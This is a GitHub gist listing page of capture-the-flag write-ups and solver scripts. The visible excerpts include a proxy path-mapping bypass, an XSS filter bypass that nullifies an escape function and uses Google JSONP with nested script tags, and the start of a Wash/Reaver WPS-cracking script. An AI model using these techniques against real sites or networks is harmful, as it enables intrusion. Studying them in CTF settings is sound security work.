Jorge jorgectf
@jorgectf
jorgectf / LINE CTF 2022 - title todo.md
Last active July 5, 2023 08:59
LINE CTF 2022 - title todo
@jorgectf
jorgectf / TSJ_CTF_2022_NimjaAtNantou.md
Last active March 26, 2022 17:26
TSJ CTF 2022 - Nimja at Nantou solution

Nimja at Nantou

map /hello-from-the-world/key http://127.0.0.1:80/forbidden
map /hello-from-the-world/    http://127.0.0.1:80
map /service-info/admin       http://127.0.0.1:5000/forbidden
map /service-info/            http://127.0.0.1:5000/

Mapping /hello-from-the-world/ to http://127.0.0.1:80 (without the trailing slash) means that /hello-from-the-world//key does not match the first rule but still resolves to a valid path under the second rule. This let us get the key:

@jorgectf
jorgectf / intigriti-xss-10-2021.md
Last active November 21, 2021 22:29
Intigriti's October 2021 XSS challenge writeup.

TL;DR

This month's challenge consists of exploiting custom JS code hosted on a Halloween-themed document. In short, we'll be injecting JS inside a <script> tag (thanks to an interesting detail in the CSP) that was previously injected into the innerHTML of a div in the document.

The solution of this challenge has been found in collaboration with @carlospolopm.

Initial approach


@jorgectf
jorgectf / sync_discord_bot.py
Created August 28, 2021 19:36
Synchronized Discord bot in Python 3.
from discord import Client, CategoryChannel
import discord.utils
from time import sleep
import threading
import asyncio
import os
class Bot(Client):
    guild = None
    guild_id = os.getenv("DISCORD_GUILD_ID", None)
@jorgectf
jorgectf / washXreaver.sh
Last active August 14, 2021 22:37 — forked from iGh0st/d4rk-r34v3r.sh
Wash and Reaver automation script.
#!/bin/bash
# Require exactly one argument: the wireless interface name
if [ "$#" -ne 1 ]; then
    echo "Illegal number of parameters"
    echo "Usage: $0 INTERFACE"
    exit 1
fi
interface=$1
if (( EUID != 0 )); then
@jorgectf
jorgectf / LineCTF_2021_Your-Notes.py
Last active March 21, 2021 01:41
Line's CTF Your Notes solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess
def random_string(length):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
@jorgectf
jorgectf / NahamConCTF_2021_AgentTester.py
Last active March 15, 2021 15:01
NahamCon CTF's AgentTester solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string
import requests
def random_string(length):
@jorgectf
jorgectf / AeroCTF_2021_Not-received-points.md
Last active March 1, 2021 10:45
AeroCTF 2021's "Not received points" solution.

Void _.escape

// this turned the client-side function that escaped our input into a no-op
_.escape = function(s) {return s}

Leak flag image uri

// XSS through JSONP from accounts.google.com
<scr<script>ipt src="https://accounts.google.com/o/oauth2/revoke?callback=(function(){
@jorgectf
jorgectf / CybexCTF_2021_WaloW3b.html
Last active February 15, 2021 15:18
CybexCTF 2021's WaloW3b solver.
<html>
<head>
<meta charset="UTF-8">
</head>
<body>
<script>
const localURL = "https://127.0.0.1:4000"
@jorgectf
jorgectf / DefCamp_2020.md
Last active November 22, 2021 18:34
Solution for some DefCamp 2020 CTF's Web challenges.